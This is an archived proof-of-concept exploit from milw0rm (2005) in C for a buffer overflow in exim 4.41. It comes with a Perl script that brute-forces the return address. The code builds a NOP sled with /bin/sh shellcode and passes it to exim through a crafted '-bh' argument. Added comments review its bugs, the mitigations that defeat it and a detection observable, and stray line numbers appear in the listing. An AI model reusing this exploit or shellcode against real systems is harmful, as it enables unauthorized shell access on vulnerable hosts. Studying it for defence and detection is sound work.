/*
This proof-of-concept demonstrates the existence of the vulnerability
reported by iDEFENSE (iDEFENSE Security Advisory 01.14.05).
It has been tested against exim-4.41 under Debian GNU/Linux.
Note that setuid () is not included in the shellcode to avoid
script-kidding.
My RET is 0xbffffae4, but fb.pl can brute-force it for you.
8
-----------
Brute Force fb.pl:
-----------
12
13 #!/usr/bin/perl
14
15 $cnt = 0xbffffa10;
16
17 while (1) {
18 $hex = sprintf ("0x%x", $cnt);
19 $res = system ("./exploit $hex");
20 printf "$hex : $res\n";
21 $cnt += 4;
22 }
23
---------
exploit.c:
---------
*/
28
#define NOP 0x90      /* x86 single-byte NOP opcode; used to fill the first INIC_SH bytes of buffer */
#define TAMBUF 368    /* payload length in bytes (presumably "tamaño del buffer"); buffer is TAMBUF + 1 */
#define INIC_SH 20    /* offset inside buffer at which the shellcode is copied (presumably "inicio shellcode") */
32 #include <stdlib.h>
33
/*
 * Entry point of the PoC.  argv[1] is the guessed return address in hex
 * (fb.pl above supplies it); the program builds one oversized argument and
 * re-executes exim with it.  The overflow itself lives in exim
 * (dns_build_reverse, per the advisory referenced above), not in this file:
 * the string passed after "::%A" is longer than the target expects.
 *
 * Review notes (code left as found):
 *  - argc is never checked, so running without an argument passes
 *    argv[1] == NULL to strtoul().
 *  - Only <stdlib.h> is included; strlen/strcpy/strcat, printf and execl are
 *    therefore implicitly declared (invalid since C99).
 *  - The PoC depends on a fixed stack address (hence the brute-force loop in
 *    fb.pl); ASLR, stack canaries and a non-executable stack each break that
 *    assumption, and the vendor fix for the advisory removes the overflow.
 *    From a detection standpoint the observable is a local user invoking
 *    exim -bh with an unusually long, non-address-like argument.
 */
int main (int argc, char **argv) {

/* Payload bytes as supplied by the author; the header comment notes that
 * setuid() is deliberately left out. */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68\x58";

char buffer [TAMBUF + 1];   /* NOP sled, shellcode, then repeated ret; +1 for the terminator */
char cadena [TAMBUF + 5];   /* "::%A" (4) + TAMBUF bytes + NUL == TAMBUF + 5, fits exactly */
int cont;
/* No argc check: argv[1] is NULL when run without arguments.  Base 16
 * matches the "0x..." string fb.pl passes. */
unsigned long ret = strtoul (argv[1], NULL, 16);

/* Fill the whole buffer with ret, one long at a time.  This assumes
 * sizeof(long) == 4 (TAMBUF / 4 stores of 4 bytes == TAMBUF bytes); on an
 * LP64 build the same loop writes 736 bytes and overruns buffer itself.
 * Accessing a char array through a long * also violates strict aliasing and
 * may be misaligned; memcpy() would be the well-defined form. */
for (cont = 0; cont < TAMBUF / 4; cont++)
*( (long *) buffer + cont) = ret;

/* Copy the shellcode in at offset INIC_SH.  strlen() returns size_t and is
 * compared with the int cont; it is also re-evaluated every iteration. */
for (cont = 0; cont < strlen (shellcode); cont++)
buffer [cont + INIC_SH] = shellcode [cont];

/* The first INIC_SH bytes become a NOP sled. */
for (cont = 0; cont < INIC_SH; cont++)
buffer [cont] = NOP;

buffer [TAMBUF] = 0;    /* terminate so strcat() below copies exactly TAMBUF bytes */
/* ret is unsigned long but printed with %x (expects unsigned int); %lx would match. */
printf ("RET = 0x%x\n", ret);
/* Prefix placed in front of the payload; presumably what steers exim into
 * the vulnerable address-parsing path -- not verifiable from this file. */
strcpy (cadena, "::%A");
strcat (cadena, buffer);
/* Re-exec exim with -bh (host-testing mode) and cadena as its argument.
 * argv[0] is "./exim" although the path is /usr/sbin/exim.  The dash in
 * "−bh" is a Unicode minus sign (U+2212) in this copy of the source,
 * presumably an extraction artefact of "-bh"; as written exim would not
 * recognise the option.  execl() returns only on failure, and that failure
 * is not reported; main() then falls off the end (C99 returns 0). */
execl ("/usr/sbin/exim", "./exim", "−bh", cadena, (char *) 0);
}
61
// milw0rm.com [2005-01-15]